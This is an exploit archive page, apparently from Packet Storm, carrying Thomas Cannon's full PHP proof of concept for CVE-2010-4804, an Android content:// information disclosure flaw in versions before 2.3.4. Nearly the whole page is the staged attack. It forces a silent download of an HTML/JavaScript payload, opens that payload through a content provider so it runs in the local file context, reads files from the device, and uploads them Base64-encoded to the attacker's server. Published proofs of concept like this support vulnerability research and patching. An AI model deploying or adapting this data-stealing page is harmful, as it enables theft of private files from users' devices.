exploit the possibilities

Android content:// Information Disclosure

Android content:// Information Disclosure
Posted Nov 29, 2011
Authored by Thomas Cannon

Android versions prior to 2.3.4 suffer from content:// URI information disclosure vulnerabilities.

tags | exploit, vulnerability, info disclosure
advisories | CVE-2010-4804
MD5 | c76756a14bf0b1c1e5b0709139a60f1f

Android content:// Information Disclosure

Change Mirror Download
<?php
/*
* Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities
* Bugtraq ID: 48256
* CVE: CVE-2010-4804
* Affected: Android < 2.3.4
* Author: Thomas Cannon
* Discovered: 18-Nov-2010
* Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/
*
* Filename: poc.php
* Instructions: Specify files you want to upload in filenames array. Host this php file
* on a server and visit it using the Android Browser. Some builds of Android
* may require adjustments to the script, for example when a German build was
* tested it downloaded the payload as .htm instead of .html, even though .html
* was specified.
*
* Tested on: HTC Desire (UK Version) with Android 2.2
*/

// List of the files on the device that we want to upload to our server
$filenames = array("/proc/version","/sdcard/img.jpg");

// Determine the full URL of this script
$protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http";
$scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];

// Stage 0: Display introduction text and a link to start the PoC.
function stage0($scripturl) {
echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>";
}

// Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect
// to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the
// context of the local device - this is the vulnerability.
function stage1($scripturl) {
echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">";
}

// Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.
// The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3).
function stage2($scripturl,$filenames) {
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=poc.html");
header("Content-Type: text/html");
header("Content-Transfer-Encoding: binary");
?>
<html>
<body>
<script language='javascript'>
var filenames = Array('<?php echo implode("','",$filenames); ?>');
var filecontents = new Array();
function processBinary(xmlhttp) {
data = xmlhttp.responseText; r = ''; size = data.length;
for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff);
return r;
}
function getFiles(filenames) {
for (var filename in filenames) {
filename = filenames[filename];
xhr = new XMLHttpRequest();
xhr.open('GET', filename, false);
xhr.overrideMimeType('text/plain; charset=x-user-defined');
xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } }
xhr.send();
}
}
function addField(form, name, value) {
var fe = document.createElement('input');
fe.setAttribute('type', 'hidden');
fe.setAttribute('name', name);
fe.setAttribute('value', value);
form.appendChild(fe);
}
function uploadFiles(filecontents) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('enctype', 'multipart/form-data');
form.setAttribute('action', '<?=$scripturl?>?stage=3');
var i = 0;
for (var filename in filecontents) {
addField(form, 'filename'+i, btoa(filename));
addField(form, 'data'+i, filecontents[filename]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
getFiles(filenames);
uploadFiles(filecontents);
</script>
</body>
</html>
<?php
}

// Stage 3: Read the file names and contents sent by the payload and write to a file on the server.
function stage3() {
$fp = fopen("files.txt", "w") or die("Couldn't open file for writing!");
fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!");
fclose($fp);
echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";
}

// Select the stage to run depending on the parameter passed in the URL
switch($_GET["stage"]) {
case "1":
stage1($scripturl);
break;
case "2":
stage2($scripturl,$filenames);
break;
case "3":
stage3();
break;
default:
stage0($scripturl);
break;
}
?>


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    15 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close